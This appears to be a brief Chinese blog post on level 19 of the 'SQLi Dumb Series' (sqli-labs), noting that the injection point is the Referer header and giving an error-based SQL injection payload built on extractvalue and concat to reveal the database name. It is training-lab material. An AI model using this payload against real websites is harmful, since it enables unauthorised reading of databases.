SQLI DUMB SERIES-19

(1)根据题意,从Referer入手

(2)报错注入与上一关相同。如爆库名:

'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

 

posted @ 2019-04-14 17:10  DurianTRY  阅读(193)  评论(0编辑  收藏  举报